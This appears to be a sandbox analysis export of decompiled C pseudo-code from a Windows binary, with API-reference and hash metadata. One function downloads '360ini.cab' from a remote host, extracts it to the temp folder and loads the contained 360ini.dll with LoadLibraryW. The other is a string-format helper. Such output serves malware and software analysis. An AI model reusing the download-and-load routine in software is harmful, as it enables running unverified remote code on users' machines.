				_t180 = ((0x92492493 * ( *(_t186 - 0xa64) -  *(_t186 - 0xa68)) >> 0x20) + _t140 >> 4 >> 0x1f) + ((0x92492493 * ( *(_t186 - 0xa64) -  *(_t186 - 0xa68)) >> 0x20) + _t140 >> 4);
				if(_t180 == 0) {
					_t140 = _t186 - 0x218;
					_t88 = E00C8AE70(L"http://dl.360safe.com/gf/360ini.cab", _t186 - 0x218);
					_t189 =  &(_t189[4]);
					__eflags = _t88;
					if(_t88 != 0) {
						L30:
						GetTempPathW(0x104, _t186 - 0x420);
						_t180 = _t186 - 0xa38;
						E00C8A750(_t140, _t186 - 0x420, _t174, _t180);
						PathAppendW(_t186 - 0x420, _t180);
						_t164 = _t186 - 0x420;
						_t93 = PathIsDirectoryW(_t164);
						__eflags = _t93;
						if(_t93 != 0) {
							L32:
							 *((char*)(_t186 - 0xa55)) = 0;
							L33:
							__eflags =  *(_t186 - 0xa5c) & 0x00000001;
							if(( *(_t186 - 0xa5c) & 0x00000001) != 0) {
								_t93 =  *((intOrPtr*)(_t186 - 0xa78)) + 0xfffffff0;
								asm("lock xadd [ecx], edx");
								_t164 = (_t164 | 0xffffffff) - 1;
								__eflags = _t164;
								if(_t164 <= 0) {
									_t164 =  *( *_t93);
									_t93 =  *(( *( *_t93))[2])(_t93);
								}
							}
							__eflags =  *((char*)(_t186 - 0xa55));
							if(__eflags != 0) {
								L25:
								_t94 =  *(_t186 - 0xa68);
								_t205 = _t94 - _t135;
								if(_t94 != _t135) {
									_push( *(_t186 - 0xa5c));
									_push(_t186 - 0xa6c);
									E00C8D420(_t94,  *(_t186 - 0xa64));
									_t164 =  *(_t186 - 0xa68);
									E00D0068E(_t135,  *(_t186 - 0xa68), _t174, _t180, _t205,  *(_t186 - 0xa68));
									_t189 =  &(_t189[0xa]);
								}
								 *(_t186 - 0xa68) = _t135;
								 *(_t186 - 0xa64) = _t135;
								 *(_t186 - 0xa60) = _t135;
								E00D0068E(_t135, _t164, _t174, _t180, _t205,  *((intOrPtr*)(_t186 - 0xa74)));
								_t97 = 0;
							} else {
								_t164 = _t186 - 0x218;
								__imp__SetupIterateCabinetW(_t186 - 0x218, _t135, E00C8A800, _t186 - 0x420);
								_t180 = _t93;
								DeleteFileW(_t186 - 0x218);
								__eflags = _t93 - _t135;
								if(__eflags == 0) {
									goto L25;
								}
								_t164 = _t186 - 0x830;
								_t103 = PathCombineW(_t186 - 0x830, _t186 - 0x420, L"360ini.dll");
								__eflags = _t103;
								if(_t103 != 0) {
									__eflags = PathFileExistsW(_t186 - 0x830);
									if(__eflags == 0) {
										goto L39;
									}
									_t107 = E00C8E370(__eflags, _t186 - 0x830, _t135, _t135, _t135);
									__eflags = _t107;
									if(_t107 != 0) {
										_t164 = _t186 - 0x830;
										_t182 = LoadLibraryW(_t186 - 0x830);
									} else {
										_t182 = 0;
									}
									E00C8B8A0(_t135, _t174, _t186);
									_t97 = _t182;
									L45:
									 *[fs:0x0] =  *((intOrPtr*)(_t186 - 0xc));
									_pop(_t175);
									_pop(_t181);
									_pop(_t136);
									return E00D0071A(_t97, _t136,  *(_t186 - 0x10) ^ _t186, _t164, _t175, _t181);
								}
								L39:
								E00C8B8A0(_t135, _t174, _t186);
								_t97 = 0;
							}
							goto L45;
						}
						_t93 =  *(E00C8B680(_t186 - 0x420, _t186, _t186 - 0xa78));
						 *(_t186 - 0xa5c) = 1;
						__imp__#165(_t135, _t93);
						 *((char*)(_t186 - 0xa55)) = 1;
						__eflags = _t93;
						if(_t93 != 0) {
							goto L33;
						}
						goto L32;
					}
					E00C8B8A0(__ebx, _t174, _t186);
					_t97 = 0;
					goto L45;
				}
				_t174 = 0;
				 *((intOrPtr*)(_t186 - 0xa78)) = 0;
				if(_t180 <= __ebx) {
					L24:
					_t164 = _t186 - 0x218;
					if(PathFileExistsW(_t186 - 0x218) != 0) {
						goto L30;
					}
					goto L25;
				}
				 *((intOrPtr*)(_t186 - 0xa7c)) = __ebx;
				do {
					 *(_t186 - 0x628) = 0;
					E00D006A0(_t174, _t186 - 0x626, _t135, 0x206);
					_t193 =  &(_t189[6]);
					if(_t174 >= _t180) {
						E00D06565();
					}
					 *((intOrPtr*)(_t186 - 0xa3c)) = 0xf;
					 *(_t186 - 0xa40) = _t135;
					 *(_t186 - 0xa50) = 0;
					E00C8BAD0(_t186 - 0xa54,  *((intOrPtr*)(_t186 - 0xa7c)),  *(_t186 - 0xa68) +  *((intOrPtr*)(_t186 - 0xa7c)), _t135, 0xffffffff);
					 *((char*)(_t186 - 4)) = 1;
					if( *((intOrPtr*)(_t186 - 0xa3c)) < 0x10) {
						_t137 = _t186 - 0xa50;
						goto L9;
					} else {
						_t137 =  *(_t186 - 0xa50);
						if(_t137 != 0) {
							L9:
							_t177 = lstrlenA(_t137) + 1;
							__eflags = _t177 - 0x3fffffff;
							if(_t177 > 0x3fffffff) {
								L12:
								_t122 = 0;
								__eflags = 0;
								L13:
								_t174 =  *((intOrPtr*)(_t186 - 0xa78));
								L14:
								wsprintfW(_t186 - 0x628, L"http://%s/gf/360ini.cab", _t122);
								_t189 =  &(_t193[6]);
								_t180 = 0;
								while(1) {
									_t170 = _t186 - 0x218;
									_t140 = _t186 - 0x628;
									if(E00C8AA00(_t137, _t186 - 0x628, _t186 - 0x218, _t186, 0) != 0) {
										break;
									}
									Sleep(0x3e8);
									_t180 =  &(_t180[0]);
									if(_t180 < 3) {
										continue;
									}
									goto L17;
								}
								 *((char*)(_t186 - 4)) = 0;
								__eflags =  *((intOrPtr*)(_t186 - 0xa3c)) - 0x10;
								if(__eflags >= 0) {
									_t140 =  *(_t186 - 0xa50);
									E00D0068E(_t137, _t170, _t174, _t180, __eflags,  *(_t186 - 0xa50));
									_t189 =  &(_t189[2]);
								}
								_t135 = 0;
								__eflags = 0;
								goto L24;
							}
							E00D0AED0(_t177 + _t177);
							_t185 = _t193;
							__eflags = _t185;
							if(__eflags == 0) {
								goto L12;
							}
							 *_t185 = 0;
							_t132 = MultiByteToWideChar(3, 0, _t137, 0xffffffff, _t185, _t177);
							asm("sbb eax, eax");
							_t122 =  ~_t132 & _t185;
							goto L13;
						}
						_t122 = 0;
						goto L14;
					}
					L17:
					 *((char*)(_t186 - 4)) = 0;
					_t202 =  *((intOrPtr*)(_t186 - 0xa3c)) - 0x10;
					if( *((intOrPtr*)(_t186 - 0xa3c)) >= 0x10) {
						E00D0068E(_t137, _t170, _t174, _t180, _t202,  *(_t186 - 0xa50));
						_t189 =  &(_t189[2]);
					}
					_t140 =  *(_t186 - 0xa64) -  *(_t186 - 0xa68);
					 *((intOrPtr*)(_t186 - 0xa7c)) =  *((intOrPtr*)(_t186 - 0xa7c)) + 0x1c;
					_t174 = _t174 + 1;
					_t180 = ((0x92492493 * ( *(_t186 - 0xa64) -  *(_t186 - 0xa68)) >> 0x20) +  *(_t186 - 0xa64) -  *(_t186 - 0xa68) >> 4 >> 0x1f) + ((0x92492493 * ( *(_t186 - 0xa64) -  *(_t186 - 0xa68)) >> 0x20) +  *(_t186 - 0xa64) -  *(_t186 - 0xa68) >> 4);
					_t135 = 0;
					 *((intOrPtr*)(_t186 - 0xa78)) = _t174;
				} while (_t174 < _t180);
				goto L24;
			}























                                                                                                                                                                                          0x00c8b0a0
                                                                                                                                                                                          0x00c8b0a0
                                                                                                                                                                                          0x00c8b0af
                                                                                                                                                                                          0x00c8b0c1
                                                                                                                                                                                          0x00c8b0cd
                                                                                                                                                                                          0x00c8b0dc
                                                                                                                                                                                          0x00c8b0e4
                                                                                                                                                                                          0x00c8b0e6
                                                                                                                                                                                          0x00c8b2ea
                                                                                                                                                                                          0x00c8b2f6
                                                                                                                                                                                          0x00c8b2fb
                                                                                                                                                                                          0x00c8b2fe
                                                                                                                                                                                          0x00c8b300
                                                                                                                                                                                          0x00c8b314
                                                                                                                                                                                          0x00c8b320
                                                                                                                                                                                          0x00c8b326
                                                                                                                                                                                          0x00c8b32c
                                                                                                                                                                                          0x00c8b33b
                                                                                                                                                                                          0x00c8b341
                                                                                                                                                                                          0x00c8b348
                                                                                                                                                                                          0x00c8b34e
                                                                                                                                                                                          0x00c8b350
                                                                                                                                                                                          0x00c8b383
                                                                                                                                                                                          0x00c8b383
                                                                                                                                                                                          0x00c8b38a
                                                                                                                                                                                          0x00c8b38a
                                                                                                                                                                                          0x00c8b391
                                                                                                                                                                                          0x00c8b399
                                                                                                                                                                                          0x00c8b3a2
                                                                                                                                                                                          0x00c8b3a6
                                                                                                                                                                                          0x00c8b3a7
                                                                                                                                                                                          0x00c8b3a9
                                                                                                                                                                                          0x00c8b3ad
                                                                                                                                                                                          0x00c8b3b3
                                                                                                                                                                                          0x00c8b3b3
                                                                                                                                                                                          0x00c8b3a9
                                                                                                                                                                                          0x00c8b3b5
                                                                                                                                                                                          0x00c8b3bc
                                                                                                                                                                                          0x00c8b28e
                                                                                                                                                                                          0x00c8b28e
                                                                                                                                                                                          0x00c8b294
                                                                                                                                                                                          0x00c8b296
                                                                                                                                                                                          0x00c8b29e
                                                                                                                                                                                          0x00c8b2ab
                                                                                                                                                                                          0x00c8b2ae
                                                                                                                                                                                          0x00c8b2b3
                                                                                                                                                                                          0x00c8b2ba
                                                                                                                                                                                          0x00c8b2bf
                                                                                                                                                                                          0x00c8b2bf
                                                                                                                                                                                          0x00c8b2c9
                                                                                                                                                                                          0x00c8b2cf
                                                                                                                                                                                          0x00c8b2d5
                                                                                                                                                                                          0x00c8b2db
                                                                                                                                                                                          0x00c8b2e3
                                                                                                                                                                                          0x00c8b3c2
                                                                                                                                                                                          0x00c8b3cf
                                                                                                                                                                                          0x00c8b3d6
                                                                                                                                                                                          0x00c8b3dc
                                                                                                                                                                                          0x00c8b3e5
                                                                                                                                                                                          0x00c8b3eb
                                                                                                                                                                                          0x00c8b3ed
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8b3ff
                                                                                                                                                                                          0x00c8b406
                                                                                                                                                                                          0x00c8b40c
                                                                                                                                                                                          0x00c8b40e
                                                                                                                                                                                          0x00c8b42c
                                                                                                                                                                                          0x00c8b42e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8b43a
                                                                                                                                                                                          0x00c8b43f
                                                                                                                                                                                          0x00c8b441
                                                                                                                                                                                          0x00c8b447
                                                                                                                                                                                          0x00c8b454
                                                                                                                                                                                          0x00c8b443
                                                                                                                                                                                          0x00c8b443
                                                                                                                                                                                          0x00c8b443
                                                                                                                                                                                          0x00c8b45c
                                                                                                                                                                                          0x00c8b461
                                                                                                                                                                                          0x00c8b463
                                                                                                                                                                                          0x00c8b46c
                                                                                                                                                                                          0x00c8b474
                                                                                                                                                                                          0x00c8b475
                                                                                                                                                                                          0x00c8b476
                                                                                                                                                                                          0x00c8b484
                                                                                                                                                                                          0x00c8b484
                                                                                                                                                                                          0x00c8b410
                                                                                                                                                                                          0x00c8b416
                                                                                                                                                                                          0x00c8b41b
                                                                                                                                                                                          0x00c8b41b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8b3bc
                                                                                                                                                                                          0x00c8b364
                                                                                                                                                                                          0x00c8b368
                                                                                                                                                                                          0x00c8b372
                                                                                                                                                                                          0x00c8b378
                                                                                                                                                                                          0x00c8b37f
                                                                                                                                                                                          0x00c8b381
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8b381
                                                                                                                                                                                          0x00c8b308
                                                                                                                                                                                          0x00c8b30d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8b30d
                                                                                                                                                                                          0x00c8b0ec
                                                                                                                                                                                          0x00c8b0ee
                                                                                                                                                                                          0x00c8b0f6
                                                                                                                                                                                          0x00c8b279
                                                                                                                                                                                          0x00c8b279
                                                                                                                                                                                          0x00c8b288
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8b288
                                                                                                                                                                                          0x00c8b0fc
                                                                                                                                                                                          0x00c8b102
                                                                                                                                                                                          0x00c8b111
                                                                                                                                                                                          0x00c8b118
                                                                                                                                                                                          0x00c8b11d
                                                                                                                                                                                          0x00c8b122
                                                                                                                                                                                          0x00c8b124
                                                                                                                                                                                          0x00c8b124
                                                                                                                                                                                          0x00c8b141
                                                                                                                                                                                          0x00c8b14b
                                                                                                                                                                                          0x00c8b151
                                                                                                                                                                                          0x00c8b158
                                                                                                                                                                                          0x00c8b15d
                                                                                                                                                                                          0x00c8b168
                                                                                                                                                                                          0x00c8b178
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8b16a
                                                                                                                                                                                          0x00c8b16a
                                                                                                                                                                                          0x00c8b172
                                                                                                                                                                                          0x00c8b17e
                                                                                                                                                                                          0x00c8b187
                                                                                                                                                                                          0x00c8b188
                                                                                                                                                                                          0x00c8b18e
                                                                                                                                                                                          0x00c8b1b9
                                                                                                                                                                                          0x00c8b1b9
                                                                                                                                                                                          0x00c8b1b9
                                                                                                                                                                                          0x00c8b1bb
                                                                                                                                                                                          0x00c8b1bb
                                                                                                                                                                                          0x00c8b1c1
                                                                                                                                                                                          0x00c8b1ce
                                                                                                                                                                                          0x00c8b1d4
                                                                                                                                                                                          0x00c8b1d7
                                                                                                                                                                                          0x00c8b1e0
                                                                                                                                                                                          0x00c8b1e0
                                                                                                                                                                                          0x00c8b1e6
                                                                                                                                                                                          0x00c8b1f3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8b1fa
                                                                                                                                                                                          0x00c8b200
                                                                                                                                                                                          0x00c8b204
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8b204
                                                                                                                                                                                          0x00c8b25b
                                                                                                                                                                                          0x00c8b25f
                                                                                                                                                                                          0x00c8b266
                                                                                                                                                                                          0x00c8b268
                                                                                                                                                                                          0x00c8b26f
                                                                                                                                                                                          0x00c8b274
                                                                                                                                                                                          0x00c8b274
                                                                                                                                                                                          0x00c8b277
                                                                                                                                                                                          0x00c8b277
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8b277
                                                                                                                                                                                          0x00c8b193
                                                                                                                                                                                          0x00c8b198
                                                                                                                                                                                          0x00c8b19a
                                                                                                                                                                                          0x00c8b19c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8b1a8
                                                                                                                                                                                          0x00c8b1ab
                                                                                                                                                                                          0x00c8b1b3
                                                                                                                                                                                          0x00c8b1b5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8b1b5
                                                                                                                                                                                          0x00c8b174
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8b174
                                                                                                                                                                                          0x00c8b206
                                                                                                                                                                                          0x00c8b206
                                                                                                                                                                                          0x00c8b20a
                                                                                                                                                                                          0x00c8b211
                                                                                                                                                                                          0x00c8b21a
                                                                                                                                                                                          0x00c8b21f
                                                                                                                                                                                          0x00c8b21f
                                                                                                                                                                                          0x00c8b228
                                                                                                                                                                                          0x00c8b22e
                                                                                                                                                                                          0x00c8b246
                                                                                                                                                                                          0x00c8b247
                                                                                                                                                                                          0x00c8b249
                                                                                                                                                                                          0x00c8b24b
                                                                                                                                                                                          0x00c8b251
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00C8B0AF
                                                                                                                                                                                          • PathAppendW.SHLWAPI(?,360ini.cab), ref: 00C8B0C1
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C8B118
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00C8B17F
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,?,00000001), ref: 00C8B1AB
                                                                                                                                                                                          • wsprintfW.USER32 ref: 00C8B1CE
                                                                                                                                                                                          • Sleep.KERNEL32(000003E8,?,?,000000FF), ref: 00C8B1FA
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?), ref: 00C8B280
                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00C8B320
                                                                                                                                                                                          • PathAppendW.SHLWAPI(?,?), ref: 00C8B33B
                                                                                                                                                                                          • PathIsDirectoryW.SHLWAPI(?), ref: 00C8B348
                                                                                                                                                                                          • SHCreateDirectory.SHELL32 ref: 00C8B372
                                                                                                                                                                                          • SetupIterateCabinetW.SETUPAPI(?,?,Function_0000A800,?), ref: 00C8B3D6
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,Function_0000A800,?), ref: 00C8B3E5
                                                                                                                                                                                          • PathCombineW.SHLWAPI(?,?,360ini.dll,?,Function_0000A800,?), ref: 00C8B406
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?,?,Function_0000A800,?), ref: 00C8B426
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?,?,?,?,?,?,Function_0000A800,?), ref: 00C8B44E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Path$File$AppendDirectoryExistsTemp$ByteCabinetCharCombineCreateDeleteIterateLibraryLoadMultiSetupSleepWide_memsetlstrlenwsprintf
                                                                                                                                                                                          • String ID: 360ini.cab$360ini.dll$http://%s/gf/360ini.cab$http://dl.360safe.com/gf/360ini.cab
                                                                                                                                                                                          • API String ID: 1292805149-140090459
                                                                                                                                                                                          • Opcode ID: a3f96d185143feba9cf96bf203a6e07fb17db4173c4e4f4a44c60b77435f0844
                                                                                                                                                                                          • Instruction ID: 70f137c7f65f98881031c5701d8619f40393c5980091cf6f7cd695719a449e10
                                                                                                                                                                                          • Opcode Fuzzy Hash: a3f96d185143feba9cf96bf203a6e07fb17db4173c4e4f4a44c60b77435f0844
                                                                                                                                                                                          • Instruction Fuzzy Hash: 47B1A271A003289BDB24EB64CC89BEEB774AB45308F0446E8E51A97291DB715F84CF66
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9CD15 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 284stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                          			E00C9CD15(intOrPtr* __ecx, void* __edx, void* __ebp, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v0;
				WCHAR* _v4;
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t40;
				WCHAR* _t46;
				signed int _t51;
				WCHAR* _t52;
				WCHAR* _t55;
				signed short _t56;
				WCHAR* _t58;
				signed int _t61;
				WCHAR* _t62;
				CHAR* _t63;
				WCHAR* _t64;
				int _t65;
				signed int _t66;
				WCHAR* _t67;
				WCHAR* _t68;
				WCHAR* _t70;
				WCHAR* _t71;
				WCHAR* _t74;
				WCHAR* _t75;
				WCHAR* _t76;
				WCHAR* _t77;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t82;
				WCHAR* _t83;
				void* _t84;
				WCHAR* _t86;
				WCHAR* _t88;
				WCHAR* _t89;
				signed int _t92;
				signed short _t93;
				WCHAR* _t95;
				WCHAR* _t97;
				WCHAR* _t101;
				WCHAR* _t102;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t114;
				intOrPtr* _t115;
				WCHAR* _t116;
				WCHAR* _t118;
				void* _t137;
				void* _t144;

				_t114 = __edx;
				_v20 = _v20 & 0x00000000;
				_t102 = _a8;
				_t118 = _a4;
				_t115 = __ecx;
				_v8 = __ecx;
				_v4 = _t102;
				if( *_t118 == 0) {
					L90:
					_push(_v20);
					_t40 = E00C99832(_t115, _t114);
					if(_t40 == 0) {
						return _t40;
					}
					E00D02DED( *_t115,  *((intOrPtr*)( *_t115 - 4)) + 1, _v0, _v8);
					E00C9A9F2(_t115, _t114, 0xffffffff);
					return 1;
				}
				do {
					if( *_t118 != 0x25) {
						L87:
						_t46 = CharNextW(_t118);
						_t34 =  &_v20;
						 *_t34 = _v20 + (_t46 - _t118 >> 1);
						__eflags =  *_t34;
						goto L88;
					}
					_t118 = CharNextW(_t118);
					_t51 =  *_t118 & 0x0000ffff;
					if(_t51 == 0x25) {
						goto L87;
					}
					_t116 = 0;
					_a8 = 0;
					if(_t51 == 0) {
						L15:
						_t52 = E00D032A3();
						_t108 = _t118;
						_a8 = _t52;
						while(1) {
							_t53 =  *_t118 & 0x0000ffff;
							if(( *_t118 & 0x0000ffff) == 0) {
								break;
							}
							_t55 = E00D0306F(_t108, _t53 & 0x0000ffff);
							_pop(_t108);
							__eflags = _t55;
							if(_t55 == 0) {
								break;
							}
							_t118 = CharNextW(_t118);
						}
						L19:
						_v12 = _v12 & 0x00000000;
						if( *_t118 != 0x2e) {
							L26:
							_t56 =  *_t118 & 0x0000ffff;
							_v16 = _v16 & 0x00000000;
							if(_t56 != 0x49 || _t118[1] != 0x36 || _t118[2] != 0x34) {
								_t58 = (_t56 & 0x0000ffff) - 0x46;
								__eflags = _t58;
								if(_t58 == 0) {
									L37:
									_t118 = CharNextW(_t118);
									goto L38;
								}
								_t86 = _t58 - 6;
								__eflags = _t86;
								if(_t86 == 0) {
									goto L37;
								}
								_t88 = _t86;
								__eflags = _t88;
								if(_t88 == 0) {
									goto L37;
								}
								_t89 = _t88 - 0x1a;
								__eflags = _t89;
								if(_t89 == 0) {
									_v16 = 0x10000;
									goto L37;
								}
								__eflags = _t89 != 4;
								if(_t89 != 4) {
									goto L38;
								}
								_v16 = 0x20000;
								goto L37;
							} else {
								_t118 =  &(_t118[3]);
								_v16 = 0x40000;
								L38:
								_t61 =  *_t118 & 0x0000ffff | _v16;
								_t137 = _t61 - 0x10063;
								if(_t137 > 0) {
									_t62 = _t61 - 0x10073;
									__eflags = _t62;
									if(_t62 == 0) {
										L65:
										_t63 =  *_t102;
										_t102 =  &(_t102[2]);
										__eflags = _t63;
										if(_t63 == 0) {
											L55:
											_t116 = 6;
											L70:
											__eflags = _t116 - _a8;
											if(_t116 <= _a8) {
												_t116 = _a8;
											}
											_t64 = _v12;
											__eflags = _t64;
											if(_t64 == 0) {
												L86:
												_v20 = _t116 + _v20;
												_t115 = _v8;
												goto L88;
											} else {
												__eflags = _t116 - _t64;
												L83:
												if(__eflags >= 0) {
													_t116 = _t64;
												}
												goto L86;
											}
										}
										_t65 = lstrlenA(_t63);
										L67:
										_t116 = _t65;
										__eflags = _t116 - 1;
										if(_t116 < 1) {
											_t116 = 1;
											__eflags = 1;
										}
										__eflags = _t116;
										if(_t116 == 0) {
											L46:
											_t66 =  *_t118 & 0x0000ffff;
											_t144 = _t66 - 0x69;
											if(_t144 > 0) {
												_t67 = _t66 - 0x6e;
												__eflags = _t67;
												if(_t67 == 0) {
													_t102 =  &(_t102[2]);
													__eflags = _t102;
													goto L86;
												}
												_t68 = _t67 - 1;
												__eflags = _t68;
												if(_t68 == 0) {
													L79:
													__eflags = _v16 & 0x00040000;
													if((_v16 & 0x00040000) == 0) {
														L81:
														_t102 =  &(_t102[2]);
														__eflags = _t102;
														L82:
														_t116 = 0x20;
														_t64 = _a8 + _v12;
														__eflags = _t64 - _t116;
														goto L83;
													}
													_t102 =  &(_t102[4]);
													goto L82;
												}
												_t70 = _t68 - 1;
												__eflags = _t70;
												if(_t70 == 0) {
													goto L81;
												}
												_t71 = _t70 - 5;
												__eflags = _t71;
												if(_t71 == 0) {
													goto L79;
												}
												__eflags = _t71 != 3;
												if(_t71 != 3) {
													goto L86;
												}
												goto L79;
											}
											if(_t144 == 0) {
												goto L79;
											}
											if(_t66 == 0x45 || _t66 == 0x47) {
												L53:
												OutputDebugStringW(L"Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CString class.");
												DebugBreak();
												goto L86;
											} else {
												if(_t66 == 0x58 || _t66 == 0x64) {
													goto L79;
												} else {
													if(_t66 + 0xffffff9b > 2) {
														goto L86;
													}
													goto L53;
												}
											}
										} else {
											goto L70;
										}
									}
									_t74 = _t62 - 0xffd0;
									__eflags = _t74;
									if(_t74 == 0) {
										L57:
										_t116 = 2;
										_t102 =  &(_t102[2]);
										goto L70;
									}
									_t75 = _t74 - 0x10;
									__eflags = _t75;
									if(_t75 == 0) {
										L63:
										_t76 =  *_t102;
										_t102 =  &(_t102[2]);
										__eflags = _t76;
										if(_t76 == 0) {
											goto L55;
										}
										_t65 = E00D00EBB(_t76);
										goto L67;
									}
									_t77 = _t75 - 0x10;
									__eflags = _t77;
									if(_t77 == 0) {
										goto L57;
									}
									__eflags = _t77 != 0x10;
									if(_t77 != 0x10) {
										goto L46;
									}
									goto L63;
								}
								if(_t137 == 0) {
									goto L57;
								}
								_t79 = _t61 - 0x43;
								if(_t79 == 0) {
									goto L57;
								}
								_t113 = 0x10;
								_t80 = _t79 - 0x10063;
								if(_t80 == 0) {
									goto L65;
								}
								_t81 = _t80 - 0x10063;
								if(_t81 == 0) {
									goto L57;
								}
								_t82 = _t81 - 0x10063;
								if(_t82 == 0) {
									_t83 =  *_t102;
									_t102 =  &(_t102[2]);
									__eflags = _t83;
									if(_t83 != 0) {
										_t65 = lstrlenW(_t83);
										goto L67;
									}
									goto L55;
								}
								_t84 = _t82 - 0xffd0;
								if(_t84 == 0) {
									goto L57;
								}
								if(_t84 == _t113) {
									goto L65;
								}
								goto L46;
							}
						}
						_t118 = CharNextW(_t118);
						_push(_t118);
						if( *_t118 != 0x2a) {
							_t92 = E00D032A3();
							_pop(_t110);
							_v12 = _t92;
							while(1) {
								_t93 =  *_t118 & 0x0000ffff;
								__eflags = _t93;
								if(_t93 == 0) {
									goto L26;
								}
								_t95 = E00D0306F(_t110, _t93 & 0x0000ffff);
								_pop(_t110);
								__eflags = _t95;
								if(_t95 == 0) {
									goto L26;
								}
								_t118 = CharNextW(_t118);
							}
							goto L26;
						}
						_t97 =  *_t102;
						_t102 =  &(_t102[2]);
						_v12 = _t97;
						_t118 = CharNextW(??);
						goto L26;
					} else {
						goto L5;
					}
					do {
						L5:
						if(_t51 != 0x23) {
							__eflags = _t51 - 0x2a;
							if(_t51 != 0x2a) {
								__eflags = _t51 - 0x2d;
								if(_t51 == 0x2d) {
									goto L13;
								}
								__eflags = _t51 - 0x2b;
								if(_t51 == 0x2b) {
									goto L13;
								}
								__eflags = _t51 - 0x30;
								if(_t51 == 0x30) {
									goto L13;
								}
								__eflags = _t51 - 0x20;
								if(_t51 != 0x20) {
									break;
								}
								goto L13;
							}
							_t101 =  *_t102;
							_t102 =  &(_t102[2]);
							_a8 = _t101;
							goto L13;
						}
						_v20 = _v20 + 2;
						L13:
						_t118 = CharNextW(_t118);
						_t51 =  *_t118 & 0x0000ffff;
					} while (_t51 != 0);
					if(_a8 != 0) {
						goto L19;
					}
					goto L15;
					L88:
					_t118 = CharNextW(_t118);
				} while ( *_t118 != 0);
				goto L90;
			}






















































                                                                                                                                                                                          0x00c9cd15
                                                                                                                                                                                          0x00c9cd18
                                                                                                                                                                                          0x00c9cd1d
                                                                                                                                                                                          0x00c9cd22
                                                                                                                                                                                          0x00c9cd2b
                                                                                                                                                                                          0x00c9cd2d
                                                                                                                                                                                          0x00c9cd31
                                                                                                                                                                                          0x00c9cd35
                                                                                                                                                                                          0x00c9d006
                                                                                                                                                                                          0x00c9d006
                                                                                                                                                                                          0x00c9d00c
                                                                                                                                                                                          0x00c9d013
                                                                                                                                                                                          0x00c9d03f
                                                                                                                                                                                          0x00c9d03f
                                                                                                                                                                                          0x00c9d025
                                                                                                                                                                                          0x00c9d031
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9d038
                                                                                                                                                                                          0x00c9cd42
                                                                                                                                                                                          0x00c9cd46
                                                                                                                                                                                          0x00c9cfeb
                                                                                                                                                                                          0x00c9cfec
                                                                                                                                                                                          0x00c9cff2
                                                                                                                                                                                          0x00c9cff2
                                                                                                                                                                                          0x00c9cff2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9cff2
